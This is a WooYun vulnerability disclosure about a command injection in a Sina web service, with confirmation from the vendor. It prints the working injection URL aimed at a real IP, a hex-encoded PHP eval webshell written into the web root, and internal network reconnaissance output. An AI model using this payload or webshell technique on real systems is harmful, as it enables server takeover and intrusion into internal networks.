当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152542

漏洞标题:新浪某处代码执行getshell直入内网

相关厂商:新浪

漏洞作者: if、so

提交时间:2015-11-07 12:27

修复时间:2015-12-22 17:04

公开时间:2015-12-22 17:04

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-07: 厂商已经确认,细节仅向厂商公开
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

code exec

详细说明:

http://61.135.152.231/webtrans/index.php?controller=user&action=login

1111.png


http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27

1111.png


set处存在代码执行

1111.png


pwd
写入shell

61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'


http://61.135.152.231/webbak/template/1.php c

[/var/www/webbak/template/]$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c
inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224
inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB)
Memory:f7200000-f7280000
eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d
inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:f7100000-f7180000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)
[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms
--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms
[/var/www/webbak/template/]$

漏洞证明:

[/var/www/webbak/template/]$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c
inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224
inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB)
Memory:f7200000-f7280000
eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d
inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:f7100000-f7180000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)
[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms
--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms
[/var/www/webbak/template/]$

修复方案:

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-07 17:03

厂商回复:

感谢支持,已经通知业务整改

最新状态:

暂无


漏洞评价:

评论

  1. 2015-11-07 12:29 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    shellcode

  2. 2015-11-07 12:56 | 坏男孩-A_A ( 路人 | Rank:12 漏洞数:6 | 菜鸟一枚)

    这里是不是要打雷了?

  3. 2015-11-07 15:20 | 故滨 ( 普通白帽子 | Rank:246 漏洞数:35 )

    微博封了猪哥的号。。。一大波漏洞来袭,厂商准备好了没

  4. 2015-11-07 16:06 | hecate ( 普通白帽子 | Rank:573 漏洞数:91 | ®高级安全工程师 | WooYun认证√)

    能帮猪哥解封么

  5. 2015-11-07 19:29 | qingxp9 ( 路人 | Rank:6 漏洞数:4 | ~~~)

    我先在前排坐下

  6. 2015-12-08 20:02 | VMApire ( 路人 | Rank:6 漏洞数:1 | ★财神网络★欢迎各位大牛加入)

    @大师兄 招收大牛,高价招收!联系我。kkjk.net